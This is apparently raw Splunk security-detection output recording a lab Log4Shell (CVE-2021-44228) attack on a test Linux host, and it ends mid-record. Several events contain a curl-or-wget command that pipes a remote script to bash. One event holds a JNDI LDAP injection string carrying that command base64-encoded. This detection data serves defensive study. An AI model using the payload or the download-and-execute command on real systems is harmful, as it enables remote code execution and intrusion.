lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640316, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Stage:Defense Evasion", annotations._all="T1105", annotations._all="CVE-2021-44228", annotations._all="Log4Shell CVE-2021-44228", annotations._all="Ingress Tool Transfer", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642640053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", info_min_time="0.000", latest_time="2022-01-20T00:21:41", risk_message="An outbound LDAP connection from 0:0:0:0:0:ffff:a00:114 in your infrastructure connecting to dest ip 0:0:0:0:0:ffff:a00:110", risk_object="0:0:0:0:0:ffff:a00:110", risk_object_type="system", risk_score="56.0", savedsearch_description="Malicious actors often abuse misconfigured LDAP servers or applications that use the LDAP servers in organizations. Outbound LDAP traffic should not be allowed outbound through your perimeter firewall. This search will help determine if you have any LDAP connections to IP addresses outside of private (RFC1918) address space.", src_ip="0:0:0:0:0:ffff:a00:114" 1642640052, search_name="ESCU - Log4Shell JNDI Payload Injection Attempt - Rule", action="Bad Request", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 3\",\"CIS 5\",\"CIS 16\"],\"context\":[\"Source:Application Log\",\"Stage:Execution\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Reconnaissance\",\"Exploitation\"],\"mitre_attack\":[\"T1190\"],\"nist\":[\"DE.CM\"],\"observable\":[]}", annotations._all="T1190", annotations._all="CIS 5", annotations._all="CVE-2021-44228", annotations._all="Stage:Execution", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 3", annotations._all="DE.CM", annotations._all="CIS 16", annotations._all="Source:Application Log", annotations._all="Exploitation", annotations._all="Reconnaissance", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 3", annotations.cis20="CIS 5", annotations.cis20="CIS 16", annotations.context="Source:Application Log", annotations.context="Stage:Execution", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Reconnaissance", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1190", annotations.nist="DE.CM", category="application/json", count="2", dest="10.0.1.21", dest_port="80", http_content_type="application/json", http_method="GET", http_referrer="unknown", http_user_agent="curl/7.79.1", info_max_time="+Infinity", info_min_time="0.000", risk_message="CVE-2021-44228 Log4Shell triggered for host 10.0.1.21", risk_object="10.0.1.21", risk_object_type="system", risk_score="15.0", savedsearch_description="CVE-2021-44228 Log4Shell payloads can be injected via various methods, but on of the most common vectors injection is via Web calls. Many of the vulnerable java web applications that are using log4j have a web component to them are specially targets of this injection, specifically projects like Apache Struts, Flink, Druid, and Solr. The exploit is triggered by a LDAP lookup function in the log4j package, its invocation is similar to `${jndi:ldap://PAYLOAD_INJECTED}`, when executed against vulnerable web applications the invocation can be seen in various part of web logs. Specifically it has been successfully exploited via headers like X-Forwarded-For, User-Agent, Referer, and X-Api-Version. In this detection we first limit the scope of our search to the Web Datamodel and use the `| from datamodel` function to benefit from schema accelerated searching capabilities, mainly because the second part of the detection is pretty heavy, it runs a regex across all _raw events that looks for `${jndi:ldap://` pattern across all potential web fields available to the raw data, like http headers for example. If you see results for this detection, it means that there was a attempt at a injection, which could be a reconnaissance activity or a valid expliotation attempt, but this does not exactly mean that the host was indeed successfully exploited.", site="localhost", src="${jndi:ldap://10.0.1.16:1389/Basic/Command/Base64/KGN1cmwgaHR0cDovLzguOC44Ljg6ODAvd3AtY29udGVudC90aGVtZXMvdHdlbnR5dGhpcnRlZW4vbTggfHwgd2dldCAtcU8gLSBodHRwOi8vOC44LjguODo4MC93cC1jb250ZW50L3RoZW1lcy90d2VudHl0aGlydGVlbi9tOCl8YmFzaA==}", url="http://10.0.1.21:80/", url_domain="10.0.1.21", user="unknown" 1642640053, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="CVE-2021-44228", annotations._all="T1059", annotations._all="PR.DS", annotations._all="Stage:Initial Access", annotations._all="Command and Control", annotations._all="PR.PT", annotations._all="CIS 13", annotations._all="T1190", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CIS 12", annotations._all="Actions on Objectives", annotations._all="DE.AE", annotations._all="DE.CM", annotations._all="Source:Endpoint", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", annotations.nist="DE.AE", annotations.nist="DE.CM", dest_ip="0:0:0:0:0:ffff:a00:110", earliest_time="2022-01-19T22:34:59", info_max_time="+Infinity", 